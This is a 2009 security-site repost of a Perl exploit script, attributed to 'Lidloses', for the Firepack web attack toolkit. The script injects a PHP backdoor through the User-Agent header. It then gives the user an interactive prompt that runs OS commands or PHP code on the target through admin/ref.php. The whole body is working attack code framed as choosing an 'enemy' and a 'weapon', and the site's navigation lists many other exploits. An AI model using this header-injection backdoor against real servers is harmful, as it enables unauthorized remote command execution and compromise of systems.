首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Firepack (admin/ref.php) Remote Code Execution Exploit 来源：www.vfcocus.net 作者：Lidloses 发布时间：2009-02-20   #!/usr/bin/perl # # Firepack - Remote Command\Code Execution Exploit # # Firepack is a web atting toolkit often used in 2008, when the most # versions of it were published. A short time ago i looked though the # sourcecode and noticed that Vulnerability which can be used # if the admin doesn't use a .htaccess protection in his admin area. # WARNING: When accessing the index.php, malware could be executed # so i recommend to execute it in a virtual environment. # Username and password are located in config.php in the main folder print(" ################################################ Firepack - Remote Command/Code Execution Exploit Date:                        17.02.2009 Vulnerability discovered by: Lidloses_Auge Exploit coded by:            Lidloses_Auge Greetz to:                   -=Player=- , Suicide,                              g4ms3, enco, Palme, GPM,                              karamble, Free-Hack ################################################ Use: 1) Your enemy URL (e.g. http://localhost/FirePack/) 2) Weapons 1 = Remote Command Execution (OS Commands) 2 = Remote Code Execution (PHP Commands) ################################################ Select the enemy now: \t"); $enemy = <STDIN>; $enemy = substr($enemy,0,length($enemy)-1); print "\nChoose your weapon!\n\n\t"; $choice = <STDIN>; $choice = substr($choice,0,length($choice)-1); if ($choice == 1 | $choice == 2) { print "\n>>> Entering the ship!"; use LWP::Simple; use LWP::UserAgent; my $ua = LWP::UserAgent->new; $param[0] = "cmd"; $param[1] = "code"; $param[2] = "system"; $param[3] = "eval"; $code = "<?php if(isset(\$_GET['$param[$choice-1]'])){echo 'fp_$param[$choice-1]1';$param[$choice+1](\$_GET['$param[$choice-1]']);echo 'fp_$param[$choice-1]2';die;} ?>"; $ua->agent($code); $req = HTTP::Request->new(GET => $enemy."index.php"); $req->header('Accept' => 'text/html'); $res = $ua->request($req); if (!($res->is_success)) { print "\nFailed! Wrong enemy dude?\n"; } else { print "\nWelcome aboard, warrior! Try some commands ('quit' to exit):"; $splitlen = length("fp_".$param[$choice-1])+1; $key = "fp_".$param[$choice-1]; while (substr($cmd,0,length($cmd)-1) ne "quit") { print "\n\n>Do: "; $cmd = <STDIN>; if (substr($cmd,0,length($cmd)-1) ne "quit") { $src = get($enemy."admin/ref.php?$param[$choice-1]=$cmd"); print "\n".substr($src,index($src,$key."1")+$splitlen,index($src,$key."2")-index($src,$key."1")-$splitlen); } } } } else { print "\nWanna fight without weapon? No way dude!"; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Oracle 10g MDSYS.SDO_TOPO_DROP ·MS Internet Explorer 7 Memory ·Internet Explorer 7.0 Exploit( ·MS09-002利用代码 ·MemHT Portal <= 4.0.1 (pvtmsg) ·Mail.com change profile cross ·Falt4 CMS RC4 (fckeditor) Arbi ·The FathFTP Active-X control s ·GeoVision LiveX_v8200 ActiveX ·University of Washington IMAP ·TPTEST <= 3.1.7 Stack Buffer O ·Got All Media version 7.0.0.3   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved